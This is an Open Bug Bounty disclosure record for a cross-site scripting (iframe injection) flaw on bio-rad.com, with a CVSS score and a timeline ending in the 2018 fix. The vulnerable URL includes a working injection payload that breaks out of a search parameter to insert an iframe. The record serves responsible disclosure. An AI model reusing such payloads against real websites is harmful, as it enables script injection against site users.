bio-rad.com IFRAME Injection vulnerability

2016-03-30T20:01:00
ID OBB:144069
Type openbugbounty
Reporter ahmetomeroglu
Modified 2018-03-15T02:10:00

Description

Open Bug Bounty ID: OBB-144069

Description| Value
---|---
Affected Website:| bio-rad.com
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.bio-rad.com/evportal/evolutionPortal.portal?_nfpb=true&_pageLabel=search_page&sfMode=search&sfStartNumber=1&clearQR=true&js=1&searchString=clinic&database=%22%3E%3Ciframe%20src=%22https://xssposed.org%22%3Eproductskus+productcategories+productdetails+msds+literatures+inserts+faqs+downloads+webpages+assays+genes+pathways+plates+promotions&tabName=DIVISIONNAME

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 30 March, 2016 20:01 GMT
Vulnerability Verified:| 30 March, 2016 20:03 GMT
Website Operator Notified:| 30 March, 2016 20:03 GMT
Vulnerability Published:| 30 March, 2016 20:03 GMT [without any technical details]
Vulnerability Fixed:| 15 March, 2018 02:10 GMT
Public Disclosure:| 15 March, 2018 02:10 GMT